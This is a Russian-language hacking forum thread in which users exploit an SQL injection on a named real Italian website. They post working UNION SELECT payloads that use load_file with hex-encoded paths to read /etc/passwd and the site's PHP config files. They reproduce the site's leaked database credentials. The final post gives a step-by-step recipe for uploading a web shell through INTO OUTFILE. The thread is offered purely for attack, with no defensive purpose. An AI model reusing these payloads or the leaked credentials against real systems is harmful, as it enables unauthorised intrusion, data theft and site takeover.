Нашел на сайте SQL- иньекцию...
Но захотелось познать новое и папробывал сделать вот так: http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2f6574632f70617 3737764),5,6,7,8/*
Скажите, что можно такого полезного узнать из этого и как играть с дирами?
P.S если поможете- поставлю "+" =))

в /etc/passwd в большинстве случаев хранится только логин-лист и все, ищи конфиги апача или фтп, может и найдешь что полезного

А как искать-то? я же незнаю другие диры..

Если админ - лох, то можно попробывать заглянуть в etc/shadow

А если не лох?

Я статью писал раскрытие пути.
Найди почитай.
Раздел Наши статьи.

']
Раздел Наши статьи.
Ссылку не скинешь?

если есть привилегии file, значит можно залить шелл через into outfile. почитай статьи на тему

Что бы узнать содержимое /etc/passwd- я переводил в HEX, а то бы залить шелл надо переводить в HEX ?

Шелл ты не зальешь, там экранирование кавычек

А вообще...надо переводить в Hex или нет?

А вообще...надо переводить в Hex или нет?
Только когда фильтрует.

данные можешь перекодировать в хекс, но тем не менее, тубу нужно будет указывать путь (inset into '/var/file.php') путь должен быть в кавычках.

А ковычки закодировать можно?

А ковычки закодировать можно?
все можно

А как кодируется ковычка?

Да и мне вообще был не интересно...
Какие директории известны миру, по которым можно путешевствовать))?
Желатьно, что бы найти что-нибудь хорошее...

0x27/ Пользуйся WinHex

Да и мне вообще был не интересно... Какие директории известны миру, по которым можно путешевствовать))? Желатьно, что бы найти что-нибудь хорошее...

Посмотри раздел PHP инжекции.

0x27/ Пользуйся WinHex

Посмотри раздел PHP инжекции.

Я на каком-то форуме (может даже и на этом) видел список всех полезныйх директорий при PHP- инклюдинге...
Но счас не могу не найти((
Не подскажите..пожалуйста))

']в /etc/passwd в большинстве случаев хранится только логин-лист и все, ищи конфиги апача или фтп, может и найдешь что полезного
В большинстве своём - это версии ядер 2.4.х и 2.6.х. Linux. В старых версиях (2.2.х и младше) пароли хранились в DES прямо в /etc/passwd

http://forum.antichat.ru/thread49775.html

И как там "путешествовать"? Я пробыал почти что все, но он не пишет не ошибку...и ничего не выводит....скажи почему

See Man
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,Version(),USER(),load_file( 0x2f6574632f706173737764),7,8/*
in you url have some error see
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2f6574632f70617 %203737764),5,6,7,8/*
:cool:

Если админ - лох, то можно попробывать заглянуть в etc/shadow
или /etc/master.passwd если это ФРЯ

или /etc/master.passwd если это ФРЯ
да врятли получится, прав не хватит

>Если админ - лох, то можно попробывать заглянуть в etc/shadow
Если админ лох, то тем не менее не думаю что он будет выставлять права на чтение=\

>Если админ - лох, то можно попробывать заглянуть в etc/shadow
Если админ лох, то тем не менее не думаю что он будет выставлять права на чтение=\

угу, это надо специально ведь выставлять, хотя мож в бэкапах какихнить и т.п. и можно найти жаль только это не фря
а админа супер секурным тоже назвать нельзя
$_DB['host'] = 'localhost';
$_DB['name'] = 'reload_priamo';
$_DB['user'] = 'root';
$_DB['pwd'] = '';

// tabelle
$_TABLE['admin'] = "cmsn_admin";
$_TABLE['dir'] ="cmsn_dir";

вобщем надо или httpd.conf (vhosts.conf) искать и там искать сайтенги на которых что нить типа phpmyadmin установлен

или просто аккаунт админа из скули выжимать, благо дело таблички есть (даже с префиксом)

угу, это надо специально ведь выставлять, хотя мож в бэкапах какихнить и т.п. и можно найти жаль только это не фря
а админа супер секурным тоже назвать нельзя
$_DB['host'] = 'localhost';
$_DB['name'] = 'reload_priamo';
$_DB['user'] = 'root';
$_DB['pwd'] = '';

// tabelle
$_TABLE['admin'] = "cmsn_admin";
$_TABLE['dir'] ="cmsn_dir";

вобщем надо или httpd.conf (vhosts.conf) искать и там искать сайтенги на которых что нить типа phpmyadmin установлен

или просто аккаунт админа из скули выжимать, благо дело таблички есть (даже с префиксом)

А где ты взял этот PHP код))?

при неправидьном запросе происходит ошибка с раскрытием путей (показывается имя скрипта с ошибкой и путь до него)Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/htdocs/cmsn/show.func.php on line 107можно предположить, что гдето есть файл index.php, вместо show.func.php подставляем index.php и кодируем в хекс, полученный результат подставляем в sql запрос в функцию load_file() получаем:http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2F7661722F77777 72F6874646F63732F636D736E2F696E6465782E706870),5,6 ,7,8/*
смотрим исходный код страницы и видим часть скрипта index.php, а имменно строчкуinclude("inc/config.inc.php");
подставляем закодированный в хекс аргумент функции include() в наш запрос, вместо index.php получаем:http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2F7661722F77777 72F6874646F63732F636D736E2F696E632F636F6E6669672E6 96E632E706870),5,6,7,8/*
смотрим исходный код, видим строчку:include("db.inc.php");подставляем закодированный в хекс аргумент функции include() в наш запрос, вместо config.inc.php получаем:http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2F7661722F77777 72F6874646F63732F636D736E2F696E632F64622E696E632E7 06870),5,6,7,8/*смотрим исходный код, видим:// parametri database
$_DB['host'] = 'localhost';
$_DB['name'] = 'reload_priamo';
$_DB['user'] = 'root';
$_DB['pwd'] = '';

// tabelle
$_TABLE['admin'] = "cmsn_admin";
$_TABLE['dir'] ="cmsn_dir";

Кодирование кавычки не поможет в заливке шелла. При указании полного пути в конструкции INTO OUTFILE требуеться обрамлять его кавычками не закодированными. Короче при magic_quotes_gpc=on шелл через скуль не залить.
Нащет того, лох или наоброт не лох админ - лично мне никогда не встречался сервак, где веб сервер (или PHP если он не как модуль сервера) имеет привелегии рута (а ведь только он может читать shadow).

Сколько не находил сайтов с скулями... Сколько их не раскуручивал так и не нашел,где через скулю моно шелл залить... я правильно запрос составляю?
http://ste.ru/news.php?id=-1+union+select+1,2,3,4,'shell',6,7+from+mysql.user +into+outfile+'путь к сайту'/* Правильно все?

Сколько не находил сайтов с скулями... Сколько их не раскуручивал так и не нашел,где через скулю моно шелл залить... я правильно запрос составляю?
http://ste.ru/news.php?id=-1+union+select+1,2,3,4,'shell',6,7+from+mysql.user +into+outfile+'путь к сайту'/* Правильно все?
Ну так-то да, но смотря что такое "shell", что значит "путь к сайту", есть ли file_priv, доступна ли запись в дирректорию, и не экранируются-ли ковычки :)

Есть ли все из тобою перечисленного есть, то шелл зальется? А сейчас такие сайты остались? - просто я не встречал... а путь к таблице обязательно нуежен))?
Ответь, пожалуйста на все вопросы)

Есть ли все из тобою перечисленного есть, то шелл зальется? А сейчас такие сайты остались? - просто я не встречал... а путь к таблице обязательно нуежен))?
Ответь, пожалуйста на все вопросы)
1 Файл прив
Проверям либо так :
union+select+file_priv+from+mysql.user+where+user= 'имя юзера под которым у тебя база' тоесть user()

Либо так:1+union+select+1,2,3,4,LOAD_FILE('/etc/passwd')/* <-- сдесь убиваем сразу двух зайцев, если файл читается, значит ковычки не экранируются

Ковычки можно проверить так-же вот как:
1+union+select+1,'2',3,4/*
если вывод есть, всё нормально

2 Далее, директория на запись:
1+union+select+1,2,3,4,'11111'+from+table+into+out file+'/bla/bla/site.ru/bla/111.txt'/*
(указывать +from+table нужно только для старых версий мускула)

Затем обращаемся к файлу через веб:
http://site.ru/bla/111.txt
и если видим наше 11111, то всё хорошо, дирректория доступна на запись.

3 Ну и собственно льём.
1+union+select+1,2,3,4,'код шелла'+from+table+into+outfile+' /bla/bla/site.ru/bla/111.php'/*
Шелл по адресу http://site.ru/bla/111.php
Сейчас такие сайты конечно-же остались, просто их мало :)